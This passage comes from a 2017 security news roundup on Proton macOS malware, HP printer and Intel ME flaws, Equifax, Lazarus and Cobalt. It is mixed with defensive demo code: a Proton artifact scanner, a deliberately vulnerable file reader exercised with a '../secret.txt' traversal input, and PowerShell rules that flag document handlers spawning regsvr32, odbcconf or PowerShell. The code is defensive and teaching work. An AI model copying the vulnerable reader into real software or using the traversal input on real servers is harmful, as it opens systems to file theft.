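    """Require the plist plus at least one hidden directory, so an unrelated
    file that merely shares the name does not trip the check on its own."""
    return bool(findings["plists"]) and bool(findings["dirs"])


def build_fixture(infected: bool = True) -> str:
    """Construct a throwaway home directory, optionally seeded with the artifacts.

    The plist content is constructed for this demo, not recovered from a sample.
    """
    home = tempfile.mkdtemp()
    agents = Path(home, "Library", "LaunchAgents")
    agents.mkdir(parents=True)
    if not infected:
        return home
    payload_dir = Path(home, ".random")
    payload_dir.mkdir()
    Path(home, ".cachedir").mkdir()
    plist = {
        "Label": "com.apple.xpcd",  # constructed label
        "ProgramArguments": [str(payload_dir / "payload")],
        "RunAtLoad": True,
    }
    with open(agents / SUSPICIOUS_PLIST, "wb") as fh:
        plistlib.dump(plist, fh)
    return home


if __name__ == "__main__":
    result = scan_for_proton(build_fixture())
    for key, items in result.items():
        for item in items:
            print(f"{key}: {item}")
    print("likely infected:", is_likely_infected(result))
```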

“Fortunately, Apple is aware of this malware and has revoked the certificate used to sign the malware. This will prevent future infections by the Symantec Malware Detector. Revoking the certificate will not, by itself, do anything to protect a machine that is already infected,” the security researchers explain.

Proton has been designed to steal login credentials and affected users are advised to take emergency actions post-infection. They should consider all of their online passwords as compromised and change all of them, while also setting up a different password for each site and storing all of them in a password manager. The master password should not be stored in the keychain or anywhere else on the computer. Enabling two-factor authentication should also minimize the impact.

This incident, the researchers note, shows the danger of fake news being used to spread malware. Due to the increased prevalence of adware for macOS, many users are looking to download malware removal tools, and cybercriminals are attempting to take advantage of that.

“Proton has been circulating for quite some time after its initial appearance in March. It has previously been distributed via a compromise of the Handbrake application and a similar compromise of a couple of Eltima Software applications. It is highly likely that Proton will continue to circulate, and similar incidents will continue to occur,” Malwarebytes concludes.

Code Execution Flaw Found in HP Enterprise Printers
22.11.2017 securityweek 
Researchers have found a potentially serious remote code execution vulnerability in some of HP’s enterprise printers. The vendor claims to have already developed a patch that will be made available to customers sometime this week.

Back in 2015, HP announced the launch of new enterprise-grade LaserJet printers fitted with security features designed to block malicious actors from breaching a company’s network. Roughly one year later, the company also announced several security improvements to its Managed Print Services.

The tech giant claims it provides “the world’s most secure printing” and a recent marketing campaign run by the company shows how printers from other vendors can allow hackers to cause significant damage to an organization.

Researchers at FoxGlove Security wanted to put HP’s claims to the test, so they acquired an HP PageWide Enterprise 586dn multi-functional printer (MFP), currently sold for $2,000, and an HP LaserJet Enterprise M553n printer, which costs roughly $500.

The experts started testing the devices using PRET (PRinter Exploitation Toolkit), a tool developed by researchers from Ruhr-Universität Bochum in Germany. When PRET was introduced, its creators claimed to have used it to find vulnerabilities in 20 printers and MFPs from HP, Brother, Lexmark, Dell, Samsung, Konica, OKI and Kyocera.

FoxGlove used PRET to find a path traversal flaw that allowed them to access the content of any print job, including PIN-protected jobs. PRET also helped them discover vulnerabilities that can be exploited to manipulate the content of print jobs, and to reset devices to factory settings, which implicitly removes the admin password.

However, the researchers’ goal was to find a vulnerability that could be exploited for remote code execution (RCE). In order to achieve this, they extracted the printer operating system and firmware and reverse engineered them. HP has implemented some mechanisms to prevent tampering with the system, but the experts managed to bypass them and gain access to files.

They then analyzed firmware updates and HP Software Solutions, which use the OXP platform and SDK to extend a printer’s functionality. Both Solutions and firmware updates are delivered as a single bundle (.BDL) file that needs to have a valid signature.

They failed to upload malicious firmware to the device due to the signature validation mechanism, but they have proposed some possible attack vectors in case others want to continue the research. On the other hand, they did crack signature validation for Solutions files, and they managed to upload a malicious DLL and execute arbitrary code.

FoxGlove Security has made available the source code of the tools used during the research, including proof-of-concept (PoC) malware.

The code execution vulnerability was reported to HP on August 21 and the company has promised to release a patch this week.

House Committees Get Serious in New Letter to Equifax
22.11.2017 securityweek  Crime
The chairpersons of the House Science, Space, and Technology Committee and the House Oversight and Government Reform Committee on Monday sent a new letter (PDF) to Paulino Barros, the interim CEO of Equifax.

The former committee's jurisdiction includes the standards of use for securing personally identifiable information (PII), while the latter committee's jurisdiction covers how data breaches impact the federal workforce and national security. Both are investigating the loss of PII on 145 million Americans announced by Equifax on September 7, 2017.

This is not the first letter to Equifax by chairpersons Lamar Smith (R-Texas) and Trey Gowdy (R-S.C.). They also wrote (PDF) on September 14, 2017 requesting 'all documents' relevant to five specific areas, such as "to and from members of Equifax's corporate leadership", and "relating to the NIST Framework or other cybersecurity standards used by Equifax." That first letter specified a deadline of no later than September 28, 2017.

It would seem that Equifax has not yet, or at least not yet satisfactorily, fulfilled this first request almost eight weeks after the deadline. "We look forward to Equifax providing all documents in response to the five categories of requested materials in the September 14 request, as well as the requests that were made at subsequent Committee briefings." It adds that the Committees expect to make additional requests in the future.

In the meantime, however, it is clear the committees are beginning to get to grips with the details of both Equifax and the breach. While the first letter requested 'areas' of documents, the second letter is far more specific. For example, it asks for documentation that would allow the identification "of any and all individuals in an executive leadership role", and those who received the DHS email alert "regarding Apache Struts 2".

It then asks for organizational charts and documents able to identify staff under the CIO during a specific period, together with breach communications with any federal agency generally, and the DHS specifically. It seeks similar charts and documents to identify staff under the CSO during the breach period, and specifically, "Any communications between former CSO Susan Mauldin and any individuals that relate to Apache Struts 2 that were made from March 8, 2017 to September 30, 2017."

Further requests make it clear that the Committees aren't looking for how the breach occurred (it was the failure to patch the Struts 2 vulnerability), but to find out exactly what happened and who was responsible for each step of the Equifax response.

For example, on July 29, 2017, Equifax was aware that hackers had been accessing the PII of as many as 143 million American consumers (later amended to more than 145 million) over the prior two months. In a press statement also released Monday, the Science, Space, and Technology committee says, "Equifax reportedly first learned on July 29, 2017, hackers had... On September 7, 2017 - nearly six weeks later - Equifax notified the public of the breach."

The delay is clearly a concern -- and this is borne out in the latest letter to Equifax. The committees have now specifically asked for, "The name and title of the individual who contacted the Federal Bureau of Investigation (FBI) on August 2, 2017", and "The names and titles of all individuals who were party to the conversation with the FBI during which the FBI told Equifax to refrain from discussing attribution".

It is noticeable that the letter does not indicate that the FBI said the breach should not be disclosed, only that attribution should not be discussed. On the basis of this letter and its requests, it would be a reasonable assumption that the House is concerned about the delay in public disclosure, and is determined to find out how and by whom it was delayed.

It is also worth noting that in one respect at least, Equifax has been very lucky. If this breach had happened in 2018 rather than 2017, it would have been within the remit of the EU's General Data Protection Regulation (GDPR). Equifax would have been in breach of GDPR in at least two major ways. Firstly, it had no legal right to hold the European PII that was stolen (it is currently thought that more than 690,000 UK consumers had PII taken); Equifax apparently forgot about the records. And secondly, because of the nature of the data stolen, Equifax would have been required to notify the affected people within 72 hours (not the nearly six weeks it actually took).

Add to this the slack attitude to patching the Apache Struts 2 vulnerability, and it is likely that any European GDPR regulator would feel obliged to levy a sizable proportion of its maximum fine of up to 4% of Equifax's annual turnover.

Symantec Patches Vulnerability in Management Console
22.11.2017 securityweek 
Symantec has released an update to address a directory traversal vulnerability in the Symantec Management Console.

Tracked as CVE-2017-15527, the security flaw has a CVSS score of 7.6 and has been assessed with a High severity rating, Symantec explains in an advisory published on Monday. The issue has been addressed in Symantec Management Console version ITMS 8.1 RU4 and all previous versions of the product are deemed vulnerable.

Directory traversal is a type of attack that occurs when user-supplied input file names aren’t properly validated or sanitized from a security perspective. Thus, characters representing “traverse to parent directory” are allowed to pass through to the file APIs.

By utilizing such attacks, a malicious actor can leverage the affected application to gain unauthorized access to the file system, Symantec explains in its advisory.
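The bug class in miniature, as an added example that is not Symantec's code and says nothing about how the Management Console itself is built: a file-serving function that joins a caller-controlled name onto a base directory with no check, beside one that resolves the path first and refuses anything outside the base. Directory layout and file names are constructed for the demo.

```python
"""Added example (not Symantec code): a hypothetical vulnerable file reader
next to a hardened one, illustrating the traversal bug class from the advisory.
"""
import os
import tempfile
from pathlib import Path


def read_file_vulnerable(base_dir: str, user_supplied_name: str) -> str:
    """Join the caller-controlled name onto base_dir with no validation.

    os.path.join passes '..' segments straight through, so a name such as
    '../secret.txt' lands outside base_dir: the "traverse to parent directory"
    characters reach the file API untouched.
    """
    path = os.path.join(base_dir, user_supplied_name)
    with open(path, "r", encoding="utf-8") as fh:
        return fh.read()


def resolve_inside(base_dir: str, user_supplied_name: str) -> Path:
    """Return the real path for the request, or raise if it escapes base_dir.

    Resolution happens after joining, so '..' segments, absolute names and
    symlinks are all collapsed before the containment check is made.
    """
    base = Path(base_dir).resolve()
    candidate = (base / user_supplied_name).resolve()
    # relative_to raises ValueError when candidate is not under base.
    try:
        candidate.relative_to(base)
    except ValueError as exc:
        raise PermissionError(f"path escapes {base}: {user_supplied_name!r}") from exc
    return candidate


def read_file_hardened(base_dir: str, user_supplied_name: str) -> str:
    """Same interface as the vulnerable reader, but confined to base_dir."""
    path = resolve_inside(base_dir, user_supplied_name)
    with open(path, "r", encoding="utf-8") as fh:
        return fh.read()


def demo() -> dict:
    """Build a throwaway tree and exercise both readers.

    Constructed layout:
        <tmp>/secret.txt          outside the served directory
        <tmp>/public/readme.txt   inside the served directory
    """
    tmp = tempfile.mkdtemp()
    public = os.path.join(tmp, "public")
    os.mkdir(public)
    Path(tmp, "secret.txt").write_text("outside\n", encoding="utf-8")
    Path(public, "readme.txt").write_text("inside\n", encoding="utf-8")

    results = {}
    results["vuln_normal"] = read_file_vulnerable(public, "readme.txt")
    results["vuln_traversal"] = read_file_vulnerable(public, "../secret.txt")
    results["hard_normal"] = read_file_hardened(public, "readme.txt")
    for label, name in (("hard_traversal", "../secret.txt"),
                        ("hard_absolute", os.path.join(tmp, "secret.txt"))):
        try:
            read_file_hardened(public, name)
            results[label] = "ALLOWED"
        except PermissionError:
            results[label] = "BLOCKED"
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value.strip()}")
```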

According to Symantec, the issue was validated by the product team engineers and an update to the Symantec Management Console was released to address it.

“Note that the latest Symantec Management Console release and patches are available to customers through normal support channels. At this time, Symantec is not aware of any exploitations or adverse customer impact from this issue,” the company says.

To reduce risk of attack, Symantec recommends restricting access to administrative or management systems to authorized privileged users; restricting remote access to trusted/authorized systems only; and using the principle of least privilege, where possible.

All systems and applications should be kept updated, a multi-layered approach to security should be adopted, and network and host-based intrusion detection systems should be deployed to monitor network traffic for suspicious activity, the company notes.

The German Federal Office for Information Security (Bundesamt für Sicherheit in der Informationstechnik, abbreviated as BSI) too has issued an alert (in German) on the Symantec Management Console directory traversal vulnerability, noting that the issue can be exploited remotely from a local network.

Lazarus APT uses an Android app to target Samsung users in South Korea
22.11.2017 securityaffairs APT

The North Korea linked group Lazarus APT has been using a new strain of Android malware to target smartphone users in South Korea.
The hacking campaign was spotted by McAfee and Palo Alto Networks; both security firms attributed the attacks to the Hidden Cobra APT.

The activity of the Lazarus APT Group surged in 2014 and 2015; its members used mostly custom-tailored malware in their attacks, and experts who investigated the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed at destroying data and disrupting systems. Security researchers discovered that the North Korean Lazarus APT group was behind recent attacks on banks, including the Bangladesh cyber heist.

According to security experts, the group was behind other large-scale cyber espionage campaigns against targets worldwide, including the Troy Operation, the DarkSeoul Operation, and the Sony Pictures hack.

The malicious code used in this latest campaign is Android malware delivered as an APK file that has been designed to mimic a Korean bible app published on Google Play by a developer named GODpeople.

The malicious APK wasn’t available on the Google Play store and it is still unclear how the APT distributed it.

“The McAfee Mobile Research team recently examined a new threat, Android malware that contains a backdoor file in the executable and linkable format (ELF). The ELF file is similar to several executables that have been reported to belong to the Lazarus cybercrime group. (For more on Lazarus, read this post from our Advanced Threat Research Team.)” states McAfee.

“The malware poses as a legitimate APK, available from Google Play, for reading the Bible in Korean. The legit app has been installed more than 1,300 times. The malware has never appeared on Google Play, and we do not know how the repackaged APK is spread in the wild.”

According to McAfee, the malware delivers a backdoor as an executable and linkable format (ELF) file, which allows the attacker to take full control of the infected device.

The list of command and control (C&C) servers used by the Android backdoor includes IP addresses previously associated with the Lazarus group.

Experts from Palo Alto Networks pointed out that the campaign appears to be aimed at Samsung device owners in South Korea.

“Unit 42 has discovered a new cluster of malware samples, which targets Samsung devices and Korean language speakers, with relationships to the malware used in Operation Blockbuster. The specific points of connection between these new samples and Operation Blockbuster include:

payloads delivered by the macros discussed in Operation Blockbuster Sequel
malware used by the HiddenCobra threat group
malware used in the 2016 attack on the Bangladesh SWIFT banking system
APK samples mimicking legitimate APKs hosted on Google Play”
states the analysis from Palo Alto Networks.

Experts from Unit 42 analyzed a PE file uploaded to VirusTotal that was used to deliver ELF ARM files and APK files from an HTTP server. The APK allows the attacker to gain full control on the target device.

Palo Alto Networks has collected evidence that links the malware with Lazarus’s attack on the SWIFT banking system and with Operation Blockbuster. The C&C infrastructure used in the latest attack is the same as that used in Lazarus’s earlier campaigns.

“It is clear that source code was reused between previously reported samples and the cluster of new samples outlined by Unit 42. Additionally, command and control IPv4 addresses were reused by the malware discussed in this analysis. Technical indicators as well as soft indicators, such as APK themes and names, provide soft and tenable ties to the actors behind Operation Blockbuster and the HiddenCobra group.” concluded Palo Alto Networks.

2017 OWASP Top 10 Final Release is out, what’s new?
22.11.2017 securityaffairs

The Open Web Application Security Project (OWASP) presented the final release for the 2017 OWASP Top 10.
The Open Web Application Security Project (OWASP) published the final version of the 2017 OWASP Top 10. In April, OWASP announced the first release candidate for the 2017 OWASP Top 10; its main novelty was the presence of the following two new vulnerability categories:

“insufficient attack detection and prevention”
“unprotected APIs.”
The 2017 OWASP Top 10 is based on data from 23 contributors covering more than 114,000 applications. OWASP published on GitHub the data used for its report.

The categories have been selected based on the risk they pose, but what are Application Security Risks?

“Attackers can potentially use many different paths through your application to do harm to your business or organization. Each of these paths represents a risk that may, or may not, be serious enough to warrant attention.” states the OWASP.

“Sometimes these paths are trivial to find and exploit, and sometimes they are extremely difficult.”

The OWASP Top 10 vulnerabilities are injection, broken authentication, sensitive data exposure, XML external entity (XXE), broken access control, security misconfiguration, cross-site scripting (XSS), insecure deserialization, using components with known vulnerabilities, and insufficient logging and monitoring.

The “insufficient attack detection and prevention” results from the merger of the current 4th and 7th items, “Insecure direct object references” and the “Missing Function Level Access Control.”

The categories have been merged into the item “Broken access control”, which dates back to 2004.

OWASP left Cross-Site Scripting (XSS) in a separate category, while it removed Cross-site request forgery (CSRF) because it is addressed by modern development frameworks. It was found that CSRF affected less than 5% of applications; Unvalidated Redirects and Forwards was found in around 8% of apps and was removed for the same reason.

New entries are XXE, insecure deserialization, and insufficient logging and monitoring, the last of which represents a serious problem for many organizations.

Google Collects Android Location Data Even When Location Service Is Disabled
21.11.2017 thehackernews Android

Do you own an Android smartphone?
If yes, then you are one of the billions of users whose smartphone is secretly gathering location data and sending it back to Google.
Google has been caught collecting location data on every Android device owner since the beginning of this year (that's for the past 11 months)—even when location services are entirely disabled, according to an investigation conducted by Quartz.
This location-sharing practice doesn't require your Android smartphone to run any app, to have location services turned on, or even to have a SIM card inserted.
All it requires is that your Android device be connected to the Internet.
The investigation revealed that Android smartphones have been collecting the addresses of nearby cellular towers, and this data could be used for "Cell Tower Triangulation"—a technique widely used to identify the location of a phone/device using data from three or more nearby cell towers.
Each time your Android device comes within range of a new cell tower, it gathers the cell tower address and sends this data back to Google when the device is connected to a WiFi network or has cellular data enabled.
Since the component responsible for collecting location data resides in Android's core Firebase Cloud Messaging service that manages push notifications and messages on the operating system, it cannot be disabled and doesn't rely on what apps you have installed—even if you factory reset your smartphone or remove the SIM card.
When Quartz contacted the tech giant about this location-sharing practice, a Google spokesperson replied: "We began looking into using Cell ID codes as an additional signal to further improve the speed and performance of message delivery."
Although it is still unknown how cell-tower data that identifies a specific cell tower could have helped Google improve message delivery, the fact that the company's mobile operating system is collecting location data is a complete violation of users' privacy.
Even in its privacy policy about location sharing, Google mentions that it will collect location information from devices that use its services, but has not indicated whether the company will collect data from Android devices when all location services are disabled.
"When you use Google services, we may collect and process information about your actual location," Google's privacy policy reads.
"We use various technologies to determine location, including IP address, GPS, and other sensors that may, for example, provide Google with information on nearby devices, Wi-Fi access points, and cell towers."
Moreover, this location-sharing practice is not limited to any particular Android phone model or manufacturer, as the tech giant was apparently collecting cell tower data from all modern Android devices before being contacted by Quartz.
Although the company said that it never used or stored the location data it collected on its users and that it is now taking steps to end this practice, such data could be used to target location-based advertising when the user enters any store or restaurant.
According to Google, Android phones will no longer gather and send cell-tower location data back to Google by the end of this month.

Tether Hacked — Attacker Steals $31 Million of Digital Tokens
21.11.2017 thehackernews CyberCrime

Again some bad news for cryptocurrency users.
Tether, a Santa Monica-based start-up that provides dollar-backed cryptocurrency tokens, has claimed that its systems have been hacked by an external attacker, who eventually stole around $31 million worth of its tokens.
With a market capitalization of $673 million, Tether is the world's first blockchain-enabled platform to allow traditional currency to be used like digital currency.
Tether serves as a proxy for the US dollar, Euro (and soon Japanese yen) that can be sent between exchanges including Bitfinex, Poloniex, Omni, GoCoin and other markets.
According to an announcement on the company's official website posted today, the unknown hacker stole the tokens (worth $30,950,010) from the Tether Treasury wallet on November 19 and sent them to an unauthorized Bitcoin address.
The stolen tokens will not be redeemed, but the company is in the process of attempting token recovery in order to prevent them from entering the broader cryptocurrency market.
The attacker is holding stolen funds at the following bitcoin address:
So, in case you receive any USDT (that's what Tether calls its platform's USD token; 1 USDT = 1 USD) "tokens from the above address, or from any downstream address that receives these tokens, do not accept them, as they have been flagged and will not be redeemable by Tether for USD," the company warned.
Bitcoin price dropped as much as 5.4 percent, the most since November 13.
To prevent the stolen coins from moving from the attacker's address, the company has temporarily suspended its back-end wallet service and also provided a new version of its software.
"Accordingly, any and all exchanges, wallets, and other Tether integrators should install this software immediately in order to prevent loss: https://github.com/tetherto/omnicore/releases/tag/0.2.99.s," the company said.
The Tether Team has also ensured that Tether issuances have not been affected by this attack, and all of its tokens remain fully backed by assets in the Tether reserve.
The only tokens that won't be redeemed at this moment are those stolen from the Tether treasury yesterday. However, these tokens will be returned to the treasury once the software enhancements are in place.
Tether is also undertaking a thorough investigation of the incident in an attempt to prevent similar attacks in the future.
This incident is the latest in a long list of attacks against the cryptocurrency markets. Just last week, about $300 million worth of Ether from dozens of Ethereum wallets was permanently locked up after someone triggered a flaw in Parity multi-sig wallets.

Critical Flaws in Intel Processors Leave Millions of PCs Vulnerable
21.11.2017 thehackernews

In the past few months, several research groups have uncovered vulnerabilities in the Intel remote administration feature known as the Management Engine (ME) which could allow remote attackers to gain full control of a targeted computer.
Now, Intel has admitted that these security vulnerabilities could "potentially place impacted platforms at risk."
The popular chipmaker released a security advisory on Monday admitting that its Management Engine (ME), remote server management tool Server Platform Services (SPS), and hardware authentication tool Trusted Execution Engine (TXE) are vulnerable to multiple severe security issues that place millions of devices at risk.
The most severe vulnerability (CVE-2017-5705) involves multiple buffer overflow issues in the operating system kernel for Intel ME Firmware that could allow attackers with local access to the vulnerable system to "load and execute code outside the visibility of the user and operating system."
The chipmaker has also described a high-severity security issue (CVE-2017-5708) involving multiple privilege escalation bugs in the operating system kernel for Intel ME Firmware that could allow an unauthorized process to access privileged content via an unspecified vector.
Systems using Intel Manageability Engine Firmware version 11.0.x.x, 11.5.x.x, 11.6.x.x, 11.7.x.x, 11.10.x.x and 11.20.x.x are impacted by these vulnerabilities.
For those unaware, Intel-based chipsets come with ME enabled for local and remote system management, allowing IT administrators to remotely manage and repair PCs, workstations, and servers within their organization.
As long as the system is connected to line power and a network cable, these remote functions can be performed out of band even when the computer is turned off, as the ME operates independently of the operating system.
Since ME has full access to almost all data on the computer, including its system memory and network adapters, exploitation of the ME flaws to execute malicious code on it could allow for a complete compromise of the platform.
"Based on the items identified through the comprehensive security review, an attacker could gain unauthorised access to the platform, Intel ME feature, and third party secrets protected by the ME, Server Platform Service (SPS), or Trusted Execution Engine (TXE)," Intel said.
Besides running unauthorized code on computers, Intel has also listed some attack scenarios where a successful attacker could crash systems or make them unstable.
Another high-severity vulnerability involves a buffer overflow issue (CVE-2017-5711) in Active Management Technology (AMT) for the Intel ME Firmware that could allow attackers with remote Admin access to the system to execute malicious code with AMT execution privilege.
AMT for Intel ME Firmware versions 8.x, 9.x, 10.x, 11.0.x.x, 11.5.x.x, 11.6.x.x, 11.7.x.x, 11.10.x.x and 11.20.x.x are impacted by this vulnerability.
The worst part is that it's almost impossible to disable the ME feature to protect against possible exploitation of these vulnerabilities.
"The disappointing fact is that on modern computers, it is impossible to completely disable ME," researchers from Positive Technologies noted in a detailed blog post published late August. "This is primarily due to the fact that this technology is responsible for initialization, power management, and launch of the main processor."
Other high severity vulnerabilities impact TXE version 3.0 and SPS version 4.0, leaving millions of computers with the feature at risk. These are described as:
High Severity Flaws in Server Platform Service (SPS)
CVE-2017-5706: This involves multiple buffer overflow issues in the operating system kernel for Intel SPS Firmware that could allow attackers with local access to the system to execute malicious code on it.
CVE-2017-5709: This involves multiple privilege escalation bugs in the operating system kernel in Intel SPS Firmware that could allow an unauthorized process to access privileged content via an unspecified vector.
Both the vulnerabilities impact Intel Server Platform Services Firmware 4.0.x.x.
High Severity Flaws in Intel Trusted Execution Engine (TXE)
CVE-2017-5707: This issue involves multiple buffer overflow flaws in the operating system kernel in Intel TXE Firmware that allow attackers with local access to the system to execute arbitrary code on it.
CVE-2017-5710: This involves multiple privilege escalation bugs in the operating system kernel in Intel TXE Firmware that allow an unauthorized process to access privileged content via an unspecified vector.
Both the vulnerabilities impact Intel Trusted Execution Engine Firmware 3.0.x.x.
Affected Intel Products
Below is the list of the processor chipsets which include the vulnerable firmware:
6th, 7th and 8th Generation Intel Core processors
Xeon E3-1200 v5 and v6 processors
Xeon Scalable processors
Xeon W processors
Atom C3000 processors
Apollo Lake Atom E3900 series
Apollo Lake Pentiums
Celeron N and J series processors
Intel has issued patches across a dozen generations of CPUs to address these security vulnerabilities, which affect millions of PCs, servers, and Internet of Things devices, and is urging affected customers to update their firmware as soon as possible.
The chipmaker has also published a Detection Tool to help Windows and Linux administrators check if their systems are exposed to any threat.
The company thanked Mark Ermolov and Maxim Goryachy from Positive Technologies Research for discovering CVE-2017-5705 and bringing it to its attention, which forced the chipmaker to review its source code for vulnerabilities.

Using Unsecured IoT Devices, DDoS Attacks Doubled in the First Half of 2017
21.11.2017 securityaffairs

According to a report recently published by the security firm Corero the number of DDoS Attacks doubled in the First Half of 2017 due to unsecured IoT.
Denial of Service (DoS) attacks have been around as long as computers have been networked. But if your business relies on the Internet to sell products or collaborate, a DoS attack is more than a nuisance, it can be critical.

Over the past few years, the number of DoS attacks has continued to slowly grow in a “cat and mouse” evolution — bad actors get a slightly stronger attack, and network vendors come up with slightly more resilient equipment to defend. Generally the attacks came from botnets comprised of infected computers and servers. The cost of acquiring and keeping these systems in the botnet was relatively expensive, so there was an economic limiter on how fast the attacks would grow. Then Mirai happened in 2016 and everything changed.

The Mirai botnet didn’t struggle with corporate security teams and technical security controls like anti virus software and firewalls.


Instead, it focused on the millions of Internet of Things (IoT) devices like webcams and Internet routers in the home to build the botnet. With no security controls to overcome, the Mirai botnet was able to grow and launch Distributed Denial of Service (DDoS) attacks larger than ever seen before. A high-profile attack against Internet journalist Brian Krebs signaled that things had changed, then the October 2016 attack against DNS provider Dyn, showed how devastating a DDoS attack can be. And in the world of a cyber criminal, devastating is where the profit opportunities lie.

According to an Arbor Networks’ report at the end of 2016, “In 2016, IoT botnets emerged as a source of incredibly high volume DDoS attacks. So far these massive attacks have not leveraged reflection/amplification techniques. They are simply taking advantage of the sheer number of unsecured IoT devices that are deployed today.” (PDF) The report goes on to highlight that the number of DDoS attacks was up significantly over 2015 and the average size and time of the attack has also increased. “The longest DDoS attack in Q4 2016 lasted for 292 hours (or 12.2 days) – significantly longer than the previous quarter’s maximum (184 hours, or 7.7 days) and set a record for 2016,” according to Kaspersky’s DDoS Intelligence Report for Q4 2016. Knowing that cyber crime is fueled by profit motives now, it is safe to assume that the cyber criminals have figured out how to monetize the IoT threat and we can expect this growing trend in attacks to continue.

We have confirmation of this trend from DDoS prevention provider Corero. According to their most recent analysis, “Organizations are now experiencing an average of 8 DDoS attack attempts per day, up from 4 per day at the beginning of 2017, fueled by unsecured IoT devices and DDoS-for-hire services.” Massive DDoS attacks are getting all of the press attention, but they are only part of the story. What is most interesting about the analysis, however, is the discovery that, “A fifth of the DDoS attack attempts recorded during Q2 2017 used multiple attack vectors. These attacks utilize several techniques in the hope that one, or the combination of a few, can penetrate the target network’s security defenses.” In other words, the criminals’ objective often isn’t the denial of service itself, but using overwhelming noise at the perimeter to hide malware injection and data exfiltration activities.

DDoS has joined other cyber crimes as a well-established, profitable exploitation technology. For as little as $20 per hour, anyone can take advantage of DDoS-as-a-Service and launch an attack at their target of choice. The opportunity to profit, from Ransom Denial of Service, where companies pay to avoid being DDoS’d, to using DDoS as a mask for other profitable cyber crime activities, means we haven’t seen the end of the growing trend in Denial of Service attacks.

Cobalt Hackers Now Targeting Banks Directly
21.11.2017 securityweek Hacking
The notorious Cobalt hackers have shown a change in tactics recently, switching their attacks to targeting banks themselves, instead of bank customers, Trend Micro reports.

Newly observed attacks appear to be part of a larger campaign that started in June and July with the targeting of Russian-speaking businesses. The techniques used are consistent with those associated with the Cobalt hacking group, but new infection chains were observed in recent incidents that targeted the bank’s employees.

Named after multifunctional penetration testing tool Cobalt Strike, the hacking group has been hitting ATMs and financial institutions across Europe. Unlike other groups that avoid Russia or Russian-speaking countries, Cobalt appears to be using the region as a testing ground for new malware and techniques, the same as the Lurk cybercriminal group, Trend Micro notes.

Last year, Russian authorities arrested 50 individuals associated with the use of the Lurk banking Trojan and supposedly took down the Angler exploit kit in the process.

In the recent attacks, the Cobalt group has been using a different vulnerability than before and also started targeting the banks themselves with spear phishing emails. The hackers are now masquerading as the customers of their targets, as a state arbitration court, and as an anti-fraud and online security company.

The group used a Rich Text Format (RTF) document with malicious macros in an attack on August 31, but switched to an exploit for CVE-2017-8759 in spam runs observed on September 20 to 21. Patched in September last year, the flaw is a code injection/remote code execution vulnerability in Microsoft’s .NET Framework.

The Cobalt hackers used this vulnerability to drop and execute Cobalt Strike from a remote server they controlled. Previously, the security bug was used to deliver the FinFisher spyware, but Trend Micro says that other threat actors have been using it of late, including the cyberespionage group ChessMaster.

As part of the attacks leveraging macro-laden RTF files, a PowerShell command is executed to retrieve a dynamic-link library (DLL) file, and odbcconf.exe, a command-line utility related to Microsoft Data Access Components, is used. The DLL drops and executes a malicious JScript using regsvr32.exe, and another JScript is dropped and executed.

The code was designed to receive backdoor commands from a remote server, and the security researchers observed it receiving a PowerShell command to download Cobalt Strike, as well as attempting to connect to a command and control (C&C) server located in France.

Infections involving CVE-2017-8759 flaw start with RTF attachments too, designed to download a Simple Object Access Protocol (SOAP) Web Services Description Language (WSDL) definition from a remote server. The code is injected into memory and downloads and executes Cobalt Strike, which in turn connects to the C&C and waits for commands.

“Many security technologies and security researchers may be utilizing newer detection mechanisms, but cybercriminals are also keeping up, adjusting their tactics to evade them. In Cobalt’s case, for instance, they’ve looked into instances of valid Windows programs or utilities as conduits that allow their malicious code to bypass whitelisting,” the security researchers note.

Mitigation techniques involve securing the use of built-in interpreters and command-line utilities such as PowerShell, odbcconf.exe and regsvr32.exe; keeping systems patched and updated at all times; securing email gateways; using network segmentation to prevent lateral movement; and monitoring the network and endpoints for anomalous activity.
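The following PowerShell is an added example, not from Trend Micro's report: a small detection routine that applies the monitoring advice above to process-creation telemetry, flagging the utilities the Cobalt chain abused (PowerShell, odbcconf.exe, regsvr32.exe) when a document handler spawns them or when they are handed a module outside the Windows directory. The field names follow Sysmon Event ID 1; the function name, sample events, paths and command lines are constructed for illustration.

```powershell
# Added example (not Trend Micro's code). Telemetry field names follow
# Sysmon Event ID 1: Image, ParentImage, CommandLine.
$AbusedUtilities  = @('powershell.exe', 'odbcconf.exe', 'regsvr32.exe')
$DocumentHandlers = @('winword.exe', 'wordpad.exe', 'excel.exe', 'outlook.exe')
$SystemRoot       = 'C:\Windows\'

function Test-CobaltStyleLolbin {
    # Evaluates one process-creation record and returns a finding or $null.
    param([Parameter(Mandatory)][pscustomobject]$Event)
    $image  = [IO.Path]::GetFileName($Event.Image).ToLowerInvariant()
    $parent = [IO.Path]::GetFileName($Event.ParentImage).ToLowerInvariant()
    $hits   = @()

    # 1) An abused utility spawned directly by a document handler: both the
    #    macro-laden RTF chain and the CVE-2017-8759 chain start this way.
    if ($image -in $AbusedUtilities -and $parent -in $DocumentHandlers) {
        $hits += "document handler $parent spawned $image"
    }

    # 2) regsvr32.exe or odbcconf.exe given a module path outside %SystemRoot%,
    #    which is how the report describes the dropped DLL and JScript running.
    if ($image -in 'regsvr32.exe', 'odbcconf.exe') {
        $paths = [regex]::Matches($Event.CommandLine, '[A-Za-z]:\\[^\s"]+') |
                 ForEach-Object Value
        foreach ($p in $paths) {
            if (-not $p.StartsWith($SystemRoot, [StringComparison]::OrdinalIgnoreCase)) {
                $hits += "$image loading module outside the Windows directory: $p"
            }
        }
    }

    if ($hits.Count -eq 0) { return $null }
    [pscustomobject]@{
        Image       = $image
        Parent      = $parent
        Reasons     = $hits
        CommandLine = $Event.CommandLine
    }
}

# Constructed telemetry, not real events: one benign launch followed by two
# records shaped like the chain described above (paths are placeholders).
$SampleEvents = @(
    [pscustomobject]@{
        ParentImage = 'C:\Windows\explorer.exe'
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe'
    },
    [pscustomobject]@{
        ParentImage = 'C:\Program Files\Microsoft Office\Office16\WINWORD.EXE'
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -c "<placeholder: DLL download command>"'
    },
    [pscustomobject]@{
        ParentImage = 'C:\Windows\System32\cmd.exe'
        Image       = 'C:\Windows\System32\regsvr32.exe'
        CommandLine = 'regsvr32.exe /s C:\Users\Public\dropped.dll'
    }
)

# Only the second and third records produce findings.
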